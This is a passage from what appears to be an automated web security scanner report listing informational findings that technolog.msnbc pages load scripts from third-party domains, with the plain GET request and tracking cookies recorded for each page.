Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.359. http://technolog.msnbc.redacted/science previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/science

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /science HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.360. http://technolog.msnbc.redacted/security previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/security

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /security HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.361. http://technolog.msnbc.redacted/smart-phone previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/smart-phone

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://widgets.twimg.com/j/2/widget.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /smart-phone HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.362. http://technolog.msnbc.redacted/social-media previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/social-media

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /social-media HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.363. http://technolog.msnbc.redacted/sony previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/sony

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /sony HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.364. http://technolog.msnbc.redacted/steve-jobs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/steve-jobs

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /steve-jobs HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.365. http://technolog.msnbc.redacted/tablets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/tablets

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /tablets HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.366. http://technolog.msnbc.redacted/technology previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/technology

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /technology HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.367. http://technolog.msnbc.redacted/twitter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/twitter

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /twitter HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.368. http://technolog.msnbc.redacted/verizon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/verizon

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /verizon HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.369. http://technolog.msnbc.redacted/verizon-wireless previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/verizon-wireless

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /verizon-wireless HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.370. http://technolog.msnbc.redacted/video previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/video

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /video HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.371. http://technolog.msnbc.redacted/video-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/video-games

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /video-games HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.372. http://technolog.msnbc.redacted/viral previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/viral

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET /viral HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.373. http://technolog.msnbc.redacted/wii previous next

Summary

